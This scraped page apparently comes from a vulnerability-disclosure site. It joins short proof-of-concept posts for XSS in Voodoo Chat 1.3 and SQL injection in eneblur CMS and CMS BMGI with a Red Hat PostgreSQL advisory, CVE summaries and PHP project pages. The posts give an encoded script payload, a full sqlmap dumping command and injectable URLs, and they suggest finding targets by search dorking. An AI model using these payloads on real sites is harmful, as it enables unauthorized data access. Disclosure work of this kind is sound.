Voodoo Chat version 1.3 suffers from a cross site scripting vulnerability.

**Voodoo Chat 1.3 Cross Site Scripting**

Posted Aug 8, 2023

Authored by indoushka

Voodoo Chat version 1.3 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | 11f7a2efbdf14e9500b0a6e971a896bbac171caeed20cc661f2b4ad1b5c02e2e

Download | Favorite | View

**Voodoo Chat 1.3 Cross Site Scripting**

    ====================================================================================================================================| # Title     : Voodoo Chat v1.3 XSS Vulnerability                                                                                 || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit)                                             || # Vendor    : http://www.swalif.net/softs/swalif30/softs258256/#post1850068                                                      |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : /pictures.php?action=add&session=1%27%22%28%29%26%25%3CScRiPt%20%3Eprompt%28958119%29%3C/ScRiPt%3E&smile_id=0[+] http://127.0.0.1/groupsyriacom/chat/pictures.php?action=add&session=1%27%22%28%29%26%25%3CScRiPt%20%3Eprompt%28958119%29%3C/ScRiPt%3E&smile_id=0Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,913)
*   Arbitrary (16,188)
*   BBS (2,859)
*   Bypass (1,740)
*   CGI (1,026)
*   Code Execution (7,273)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,342)
*   DoS (23,412)
*   Encryption (2,369)
*   Exploit (51,815)
*   File Inclusion (4,221)
*   File Upload (972)
*   Firewall (821)
*   Info Disclosure (2,766)
*   Intrusion Detection (892)
*   Java (3,043)
*   JavaScript (858)
*   Kernel (6,666)
*   Local (14,447)
*   Magazine (586)
*   Overflow (12,690)
*   Perl (1,423)
*   PHP (5,141)
*   Proof of Concept (2,338)
*   Protocol (3,601)
*   Python (1,535)
*   Remote (30,747)
*   Root (3,579)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,639)
*   Security Tool (7,883)
*   Shell (3,180)
*   Shellcode (1,214)
*   Sniffer (894)
*   Spoof (2,206)
*   SQL Injection (16,359)
*   TCP (2,404)
*   Trojan (687)
*   UDP (891)
*   Virus (664)
*   Vulnerability (31,763)
*   Web (9,660)
*   Whitepaper (3,749)
*   x86 (962)
*   XSS (17,921)
*   Other

**File Archives**

*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,808)
*   Fedora (1,692)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,407)
*   Mac OS X (686)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (484)
*   RedHat (13,704)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,799)
*   UNIX (9,286)
*   UnixWare (186)
*   Windows (6,568)
*   Other

Voodoo Chat 1.3 Cross Site Scripting

eneblur CMS version 1.0 suffers from a remote SQL injection vulnerability.

**eneblur CMS 1.0 SQL Injection**

Posted Aug 8, 2023

Authored by indoushka

eneblur CMS version 1.0 suffers from a remote SQL injection vulnerability.

tags | exploit, remote, sql injection

SHA-256 | 4d67639c944054e33175ed2e55a36b45439dd449f6e73134fe454cc1d6a7bb71

Download | Favorite | View

**eneblur CMS 1.0 SQL Injection**

    ====================================================================================================================================| # Title     : eneblur CMS 1.0 SQL injection Vulnerability                                                                        || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 115.0.2(64-bit)                                            | | # Vendor    : https://www.eneblur.com/web-application-development.php                                                            |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /journal_details.php?jid= <===== inject here [+] D:\sqlmap>sqlmap.py -u http://127.0.0.1/wenvirobiotechjournalscom/journal_details.php?jid=3 --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 --tables -D envirobi_portal_server3Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,913)
*   Arbitrary (16,188)
*   BBS (2,859)
*   Bypass (1,740)
*   CGI (1,026)
*   Code Execution (7,273)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,342)
*   DoS (23,412)
*   Encryption (2,369)
*   Exploit (51,815)
*   File Inclusion (4,221)
*   File Upload (972)
*   Firewall (821)
*   Info Disclosure (2,766)
*   Intrusion Detection (892)
*   Java (3,043)
*   JavaScript (858)
*   Kernel (6,666)
*   Local (14,447)
*   Magazine (586)
*   Overflow (12,690)
*   Perl (1,423)
*   PHP (5,141)
*   Proof of Concept (2,338)
*   Protocol (3,601)
*   Python (1,535)
*   Remote (30,747)
*   Root (3,579)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,639)
*   Security Tool (7,883)
*   Shell (3,180)
*   Shellcode (1,214)
*   Sniffer (894)
*   Spoof (2,206)
*   SQL Injection (16,359)
*   TCP (2,404)
*   Trojan (687)
*   UDP (891)
*   Virus (664)
*   Vulnerability (31,763)
*   Web (9,660)
*   Whitepaper (3,749)
*   x86 (962)
*   XSS (17,921)
*   Other

**File Archives**

*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,808)
*   Fedora (1,692)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,407)
*   Mac OS X (686)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (484)
*   RedHat (13,704)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,799)
*   UNIX (9,286)
*   UnixWare (186)
*   Windows (6,568)
*   Other

eneblur CMS 1.0 SQL Injection

Red Hat Security Advisory 2023-4527-01 - PostgreSQL is an advanced object-relational database management system.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: postgresql:13 security update  
Advisory ID:       RHSA-2023:4527-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4527  
Issue date:        2023-08-08  
CVE Names:         CVE-2023-2454 CVE-2023-2455   
=====================================================================

1. Summary:

An update for the postgresql:13 module is now available for Red Hat  
Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 8) - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

PostgreSQL is an advanced object-relational database management system  
(DBMS).

Security Fix(es):

* postgresql: schema_element defeats protective search_path changes  
(CVE-2023-2454)

* postgresql: row security policies disregard user ID changes after  
inlining. (CVE-2023-2455)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

If the postgresql service is running, it will be automatically restarted  
after installing this update.

5. Bugs fixed (https://bugzilla.redhat.com/):

2207568 - CVE-2023-2454 postgresql: schema_element defeats protective search_path changes  
2207569 - CVE-2023-2455 postgresql: row security policies disregard user ID changes after inlining.

6. Package List:

Red Hat Enterprise Linux AppStream (v. 8):

Source:  
pg_repack-1.4.6-3.module+el8.5.0+11357+bcc62552.src.rpm  
pgaudit-1.5.0-1.module+el8.4.0+8873+b821c30a.src.rpm  
postgres-decoderbufs-0.10.0-2.module+el8.4.0+8873+b821c30a.src.rpm  
postgresql-13.11-1.module+el8.8.0+19081+0a277c66.src.rpm

aarch64:  
pg_repack-1.4.6-3.module+el8.5.0+11357+bcc62552.aarch64.rpm  
pg_repack-debuginfo-1.4.6-3.module+el8.5.0+11357+bcc62552.aarch64.rpm  
pg_repack-debugsource-1.4.6-3.module+el8.5.0+11357+bcc62552.aarch64.rpm  
pgaudit-1.5.0-1.module+el8.4.0+8873+b821c30a.aarch64.rpm  
pgaudit-debuginfo-1.5.0-1.module+el8.4.0+8873+b821c30a.aarch64.rpm  
pgaudit-debugsource-1.5.0-1.module+el8.4.0+8873+b821c30a.aarch64.rpm  
postgres-decoderbufs-0.10.0-2.module+el8.4.0+8873+b821c30a.aarch64.rpm  
postgres-decoderbufs-debuginfo-0.10.0-2.module+el8.4.0+8873+b821c30a.aarch64.rpm  
postgres-decoderbufs-debugsource-0.10.0-2.module+el8.4.0+8873+b821c30a.aarch64.rpm  
postgresql-13.11-1.module+el8.8.0+19081+0a277c66.aarch64.rpm  
postgresql-contrib-13.11-1.module+el8.8.0+19081+0a277c66.aarch64.rpm  
postgresql-contrib-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.aarch64.rpm  
postgresql-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.aarch64.rpm  
postgresql-debugsource-13.11-1.module+el8.8.0+19081+0a277c66.aarch64.rpm  
postgresql-docs-13.11-1.module+el8.8.0+19081+0a277c66.aarch64.rpm  
postgresql-docs-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.aarch64.rpm  
postgresql-plperl-13.11-1.module+el8.8.0+19081+0a277c66.aarch64.rpm  
postgresql-plperl-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.aarch64.rpm  
postgresql-plpython3-13.11-1.module+el8.8.0+19081+0a277c66.aarch64.rpm  
postgresql-plpython3-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.aarch64.rpm  
postgresql-pltcl-13.11-1.module+el8.8.0+19081+0a277c66.aarch64.rpm  
postgresql-pltcl-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.aarch64.rpm  
postgresql-server-13.11-1.module+el8.8.0+19081+0a277c66.aarch64.rpm  
postgresql-server-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.aarch64.rpm  
postgresql-server-devel-13.11-1.module+el8.8.0+19081+0a277c66.aarch64.rpm  
postgresql-server-devel-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.aarch64.rpm  
postgresql-static-13.11-1.module+el8.8.0+19081+0a277c66.aarch64.rpm  
postgresql-test-13.11-1.module+el8.8.0+19081+0a277c66.aarch64.rpm  
postgresql-test-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.aarch64.rpm  
postgresql-upgrade-13.11-1.module+el8.8.0+19081+0a277c66.aarch64.rpm  
postgresql-upgrade-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.aarch64.rpm  
postgresql-upgrade-devel-13.11-1.module+el8.8.0+19081+0a277c66.aarch64.rpm  
postgresql-upgrade-devel-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.aarch64.rpm

noarch:  
postgresql-test-rpm-macros-13.11-1.module+el8.8.0+19081+0a277c66.noarch.rpm

ppc64le:  
pg_repack-1.4.6-3.module+el8.5.0+11357+bcc62552.ppc64le.rpm  
pg_repack-debuginfo-1.4.6-3.module+el8.5.0+11357+bcc62552.ppc64le.rpm  
pg_repack-debugsource-1.4.6-3.module+el8.5.0+11357+bcc62552.ppc64le.rpm  
pgaudit-1.5.0-1.module+el8.4.0+8873+b821c30a.ppc64le.rpm  
pgaudit-debuginfo-1.5.0-1.module+el8.4.0+8873+b821c30a.ppc64le.rpm  
pgaudit-debugsource-1.5.0-1.module+el8.4.0+8873+b821c30a.ppc64le.rpm  
postgres-decoderbufs-0.10.0-2.module+el8.4.0+8873+b821c30a.ppc64le.rpm  
postgres-decoderbufs-debuginfo-0.10.0-2.module+el8.4.0+8873+b821c30a.ppc64le.rpm  
postgres-decoderbufs-debugsource-0.10.0-2.module+el8.4.0+8873+b821c30a.ppc64le.rpm  
postgresql-13.11-1.module+el8.8.0+19081+0a277c66.ppc64le.rpm  
postgresql-contrib-13.11-1.module+el8.8.0+19081+0a277c66.ppc64le.rpm  
postgresql-contrib-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.ppc64le.rpm  
postgresql-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.ppc64le.rpm  
postgresql-debugsource-13.11-1.module+el8.8.0+19081+0a277c66.ppc64le.rpm  
postgresql-docs-13.11-1.module+el8.8.0+19081+0a277c66.ppc64le.rpm  
postgresql-docs-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.ppc64le.rpm  
postgresql-plperl-13.11-1.module+el8.8.0+19081+0a277c66.ppc64le.rpm  
postgresql-plperl-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.ppc64le.rpm  
postgresql-plpython3-13.11-1.module+el8.8.0+19081+0a277c66.ppc64le.rpm  
postgresql-plpython3-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.ppc64le.rpm  
postgresql-pltcl-13.11-1.module+el8.8.0+19081+0a277c66.ppc64le.rpm  
postgresql-pltcl-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.ppc64le.rpm  
postgresql-server-13.11-1.module+el8.8.0+19081+0a277c66.ppc64le.rpm  
postgresql-server-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.ppc64le.rpm  
postgresql-server-devel-13.11-1.module+el8.8.0+19081+0a277c66.ppc64le.rpm  
postgresql-server-devel-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.ppc64le.rpm  
postgresql-static-13.11-1.module+el8.8.0+19081+0a277c66.ppc64le.rpm  
postgresql-test-13.11-1.module+el8.8.0+19081+0a277c66.ppc64le.rpm  
postgresql-test-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.ppc64le.rpm  
postgresql-upgrade-13.11-1.module+el8.8.0+19081+0a277c66.ppc64le.rpm  
postgresql-upgrade-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.ppc64le.rpm  
postgresql-upgrade-devel-13.11-1.module+el8.8.0+19081+0a277c66.ppc64le.rpm  
postgresql-upgrade-devel-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.ppc64le.rpm

s390x:  
pg_repack-1.4.6-3.module+el8.5.0+11357+bcc62552.s390x.rpm  
pg_repack-debuginfo-1.4.6-3.module+el8.5.0+11357+bcc62552.s390x.rpm  
pg_repack-debugsource-1.4.6-3.module+el8.5.0+11357+bcc62552.s390x.rpm  
pgaudit-1.5.0-1.module+el8.4.0+8873+b821c30a.s390x.rpm  
pgaudit-debuginfo-1.5.0-1.module+el8.4.0+8873+b821c30a.s390x.rpm  
pgaudit-debugsource-1.5.0-1.module+el8.4.0+8873+b821c30a.s390x.rpm  
postgres-decoderbufs-0.10.0-2.module+el8.4.0+8873+b821c30a.s390x.rpm  
postgres-decoderbufs-debuginfo-0.10.0-2.module+el8.4.0+8873+b821c30a.s390x.rpm  
postgres-decoderbufs-debugsource-0.10.0-2.module+el8.4.0+8873+b821c30a.s390x.rpm  
postgresql-13.11-1.module+el8.8.0+19081+0a277c66.s390x.rpm  
postgresql-contrib-13.11-1.module+el8.8.0+19081+0a277c66.s390x.rpm  
postgresql-contrib-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.s390x.rpm  
postgresql-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.s390x.rpm  
postgresql-debugsource-13.11-1.module+el8.8.0+19081+0a277c66.s390x.rpm  
postgresql-docs-13.11-1.module+el8.8.0+19081+0a277c66.s390x.rpm  
postgresql-docs-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.s390x.rpm  
postgresql-plperl-13.11-1.module+el8.8.0+19081+0a277c66.s390x.rpm  
postgresql-plperl-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.s390x.rpm  
postgresql-plpython3-13.11-1.module+el8.8.0+19081+0a277c66.s390x.rpm  
postgresql-plpython3-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.s390x.rpm  
postgresql-pltcl-13.11-1.module+el8.8.0+19081+0a277c66.s390x.rpm  
postgresql-pltcl-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.s390x.rpm  
postgresql-server-13.11-1.module+el8.8.0+19081+0a277c66.s390x.rpm  
postgresql-server-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.s390x.rpm  
postgresql-server-devel-13.11-1.module+el8.8.0+19081+0a277c66.s390x.rpm  
postgresql-server-devel-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.s390x.rpm  
postgresql-static-13.11-1.module+el8.8.0+19081+0a277c66.s390x.rpm  
postgresql-test-13.11-1.module+el8.8.0+19081+0a277c66.s390x.rpm  
postgresql-test-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.s390x.rpm  
postgresql-upgrade-13.11-1.module+el8.8.0+19081+0a277c66.s390x.rpm  
postgresql-upgrade-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.s390x.rpm  
postgresql-upgrade-devel-13.11-1.module+el8.8.0+19081+0a277c66.s390x.rpm  
postgresql-upgrade-devel-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.s390x.rpm

x86_64:  
pg_repack-1.4.6-3.module+el8.5.0+11357+bcc62552.x86_64.rpm  
pg_repack-debuginfo-1.4.6-3.module+el8.5.0+11357+bcc62552.x86_64.rpm  
pg_repack-debugsource-1.4.6-3.module+el8.5.0+11357+bcc62552.x86_64.rpm  
pgaudit-1.5.0-1.module+el8.4.0+8873+b821c30a.x86_64.rpm  
pgaudit-debuginfo-1.5.0-1.module+el8.4.0+8873+b821c30a.x86_64.rpm  
pgaudit-debugsource-1.5.0-1.module+el8.4.0+8873+b821c30a.x86_64.rpm  
postgres-decoderbufs-0.10.0-2.module+el8.4.0+8873+b821c30a.x86_64.rpm  
postgres-decoderbufs-debuginfo-0.10.0-2.module+el8.4.0+8873+b821c30a.x86_64.rpm  
postgres-decoderbufs-debugsource-0.10.0-2.module+el8.4.0+8873+b821c30a.x86_64.rpm  
postgresql-13.11-1.module+el8.8.0+19081+0a277c66.x86_64.rpm  
postgresql-contrib-13.11-1.module+el8.8.0+19081+0a277c66.x86_64.rpm  
postgresql-contrib-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.x86_64.rpm  
postgresql-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.x86_64.rpm  
postgresql-debugsource-13.11-1.module+el8.8.0+19081+0a277c66.x86_64.rpm  
postgresql-docs-13.11-1.module+el8.8.0+19081+0a277c66.x86_64.rpm  
postgresql-docs-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.x86_64.rpm  
postgresql-plperl-13.11-1.module+el8.8.0+19081+0a277c66.x86_64.rpm  
postgresql-plperl-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.x86_64.rpm  
postgresql-plpython3-13.11-1.module+el8.8.0+19081+0a277c66.x86_64.rpm  
postgresql-plpython3-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.x86_64.rpm  
postgresql-pltcl-13.11-1.module+el8.8.0+19081+0a277c66.x86_64.rpm  
postgresql-pltcl-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.x86_64.rpm  
postgresql-server-13.11-1.module+el8.8.0+19081+0a277c66.x86_64.rpm  
postgresql-server-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.x86_64.rpm  
postgresql-server-devel-13.11-1.module+el8.8.0+19081+0a277c66.x86_64.rpm  
postgresql-server-devel-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.x86_64.rpm  
postgresql-static-13.11-1.module+el8.8.0+19081+0a277c66.x86_64.rpm  
postgresql-test-13.11-1.module+el8.8.0+19081+0a277c66.x86_64.rpm  
postgresql-test-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.x86_64.rpm  
postgresql-upgrade-13.11-1.module+el8.8.0+19081+0a277c66.x86_64.rpm  
postgresql-upgrade-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.x86_64.rpm  
postgresql-upgrade-devel-13.11-1.module+el8.8.0+19081+0a277c66.x86_64.rpm  
postgresql-upgrade-devel-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-2454  
https://access.redhat.com/security/cve/CVE-2023-2455  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJk0k8pAAoJENzjgjWX9erE+eYQAJRHA0QdZv5xV9TWliWdsitH  
6tP5HpsBibR5c1ZZTYGULESqi1fiiDa2qD9rvT0bY+17LdhfSofd57OqUT+SCI1g  
AQ5umKalGbrpvNQ86FJ90UjTpASSdP3cCrdZ8cvJbyNgvjE+pQmkH4rJUxz1PD1j  
6dI+TLEsRSspOADDeuDESuLEwV6IYezmraPoLFyNr6+fE8Byfldf7tTFqu0PT8pD  
edQiQqRfbRSK2MiVQPWFdBlfHbLLUzzMl+IYIyCWDGdAglsnqOQqQUyGoH1b+gKd  
O/TauZ8kV1t9KlJSdo5GJFWrY6nULBunrB3uRWEi7iV+WtqF1oc/42HhcZ+PDKFd  
H/uDTAek+QiCuKJqpnGnwDf+gTUQupvlSN6+1hHSr/VN0j4IL1s0CJ6n1DIXj4Wv  
ewHllUnsUzstH6fA/tDOx31MBsEUPgb3HNagHjuwNf+kBeGAVDFWTaMlk082NgX5  
5fa2PrgpqQQQ6fvwBypoPhiqlnuevJW+FRSyqPNcSGg0b1o7BGbNqsXQG7mPKikt  
e7HpJ/9IHDMHXJG4jI3Dz4xe17xFSC9P+YWGeRHrVpoEe4ad6N0+uCYFBztaUAuv  
NCKdrDr8pTeZObDQbZ/zozirUQINLOlZW28gfHCVX3B6XD4v/NgD08PPcWziepjZ  
Bb739FMpHL9bwdagWyGU  
=+g0V  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4527-01

CMS BMGI International version 4.0 suffers from a remote SQL injection vulnerability.

    ====================================================================================================================================| # Title     : CMS BMGI International v 4.0 Sql injection Vulnerability                                                           || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(64-bit)                                             || # Vendor    : https://batel.net/                                                                                                 |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine [+] inject here : /_Admin_root/authentification.php?lang=1&pw=1&user=yymfqisv[+] http://127.0.0.1/scimatdz/_Admin_root/authentification.php?lang=1&pw=1&user=yymfqisvGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

CMS BMGI International 4.0 SQL Injection

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Digital Ant E-Commerce Software allows SQL Injection.This issue affects E-Commerce Software: before 11.



CVE-2023-3651

A vulnerability was found in SourceCodester Doctors Appointment System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file login.php. The manipulation of the argument useremail leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-236365 was assigned to this vulnerability.

CVE-2023-4219

Judging Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /php-jms/deductScores.php.

Submitted by oretnom23 on Friday, December 2, 2022 - 14:30.

This project is entitled **Judging Management System**. It is a web-based application that was developed using **PHP Language** and **MySQL Database**. The application provides an online and automated judging system. I manage certain organizations' event contests. It has a pleasant user interface and consists of user-friendly features and functionalities.

****How does the Judging Management System work?****

**The Judging Management System** is an automated or electronic platform for managing and tallying certain contest scoring. This application allows certain organization management or staff to register on the system for free. **Organizer** or user can simply create their account by filling in all the required fields on the registration form. Registered organizers can create multiple events and sub-events. They can list the event contestants, judges, and criteria if the sub-event is activated. Judges can manage the score of the contestant using the system-generated judge code. The system also contains an Overall tally, tally by judges, contestant ranking, and event placing features.

****Features and Functionalities****

The **Judging Management System** project is consist of the following features and functionalities.

****Organizers****

*   **Manage Event List**
*   **Manage Sub-Event**
*   **Manage Sub-Event Settings**
    *   List of Contestant
    *   List of Judges
    *   Criteria Management
*   **Score Sheets Management**
    *   Live View of Scores
    *   View Contestant Scores per Judges
    *   Deduct Contestant Point(s)
    *   Generate Final Result
    *   Generate Over All Result
*   **Review Data**
*   **Manage Organizer's Basic and Company Information**
*   **Add/Edit Tabulator User**

****Tabulator****

*   **Live View of Scores**
*   **View Contestant Scores per Judges**
*   **Deduct Contestant Point(s)**
*   **Generate Final Result**
*   **Generate Over All Result**

****Judges****

*   **Manage Contestant Score**
*   **Update Contestant Score**
*   **View Tally**

****Snapshots****

Here are some snapshots of some pages of the **Judging Management System**

****Event List****

****Event's List of Judges****

****Judge Panel's Scoring Page****

****Judge Panel's Tally Page****

****Event's Contestant Scores Per Judge****

The **Judging Management System** project source code is available on this website. The source code is a modified copy and not developed from scratch _(unmodified copy was downloaded from http://freeproject24.com/php-judging-system-with-source-code-freeproject24/)_. Feel free to download the modified copy on this site.

****How to Run?****

****Requirements****

*   **Download** and **Install** any **local web server** such as **XAMPP.**
*   **Download** the provided source code **zip** file. (_download button is located below_)

****System Installation/Setup****

1.  **Open** your **XAMPP Control Panel** and start ****Apache**** and ****MySQL****.
2.  **Extract** the **downloaded source code **zip** file**.
3.  **Copy** the extracted source code folder and **paste** it into the **XAMPP's "htdocs" directory**.
4.  **Browse** the ****PHPMyAdmin**** in a **browser**. i.e. ****http://localhost/phpmyadmin****
5.  **Create** a **new database** named ****jms\_db****.
6.  **Import** the provided ****SQL**** file. The file is known as ****jms\_db.sql**** located inside the **db** folder.
7.  **Browse** the **Judging Management System** in a **browser**. i.e. ****http://localhost/php-jms/****.

You can simply create your own organizer user by registering on the system.

That's it! I hope this **Judging Management System in PHP and MySQL Database Project** helps you with what you are looking for and that you'll find something useful also from the source code itself for your current and future **PHP Projects**.

Explore more on this website for more **Tutorials** and **Free Source Codes**.

****Enjoy :)****

*   4543 views

CVE-2023-37682: Judging Management System using PHP and MySQL Free Source Code

Online Nurse Hiring System v1.0 was discovered to contain a cross-site scripting (XSS) vulnerability in the Add Nurse Page in the Admin portal.

**Online Nurse Hiring System using PHP and MySQL**

“Online Nurse Hiring System Project ” is a web based application that contains data and information of nurses. The main purpose of the “Online Nurse Hiring Management Project” is to systematically record, store and update the nurse’s records.

**Project Requirements**

Project Name

Online Nurse Hiring System in PHP

Language Used

PHP5.6, PHP7.x

Database

MySQL 5.x

User Interface Design

HTML, AJAX,JQUERY,JAVASCRIPT

Web Browser

Mozilla, Google Chrome, IE8, OPERA

Software

XAMPP / Wamp / Mamp/ Lamp (anyone)

**Project Modules**

In Online Nurse Hiring Management System we use PHP and MySQL database. This is the project which keeps records of nurses. Online Nurse Hiring System has two module i.e. admin and users.

**Admin Module**

**Dashboard**: In this section admin can briefly view total number of nurses, total new requests for nurses, the total accepted request for nurse and total rejected request for nurse.

**Nurse**: In this section, admin can manage the Nurse (add/update/delete).

**Nurse Request**: In this section, admin can view the nurse request which is sent by users and also have right to change the status of request.

**Report**: In this section, admin can view number of nurse request received in particular periods and also search nurse request according to booking number.

**Account Setting: In this section, admin can do following activity.**

**Profile**: In this section admin can update his/her profile.

**Change Password**: In this section admin can change his/her own passwords

**Logout**: Through this button admin can logout.

**Forgot Password:** In this section, admin can reset his/her password by using registered email id and contact number.

**Note**:  In this project MD5 encryption method used.

**Users**:

Users can send a nurse request.

****Some of the Project Screens****

**Home Page**

**Nurse Booking**

**Admin Login**

**Admin Dashboard**

**How to run the Online Nurse Hiring System (onhs) Project**

1\. Download the zip file

2\. Extract the file and copy onhs folder

3.Paste inside root directory(for xampp xampp/htdocs, for wamp wamp/www, for lamp var/www/HTML)

4.Open PHPMyAdmin (http://localhost/phpmyadmin)

5\. Create a database with the name onhsdb

6\. Import onhsdb.sql file(given inside the zip package in the SQL file folder)

7\. Run the script http://localhost/onhs

**Credential for Admin panel :**

**Username:** admin  
**Password:** Test@123

**View Demo**

Download Source Code (ONHS Project PHP)

Size: 33 MB

Version: V 1.0

**Project Report**

Anuj Kumar

Hi! I am Anuj Kumar, a professional web developer with 5+ years of experience in this sector. I found PHPGurukul in September 2015. My keen interest in technology and sharing knowledge with others became the main reason for starting PHPGurukul. My basic aim is to offer all web development tutorials like PHP, PDO, jQuery, PHP oops, MySQL, etc. Apart from the tutorials, we also offer you PHP Projects, and we have around 100+ PHP Projects for you.

CVE-2023-37686: Online Nurse Hiring Management System | Nurse Hiring Management Project in PHP

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Oduyo Online Collection Software allows SQL Injection.This issue affects Online Collection Software: before 1.0.1.



CVE-2023-3716

Maid Hiring Management System v1.0 was discovered to contain a SQL injection vulnerability in the Booking Request page.

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
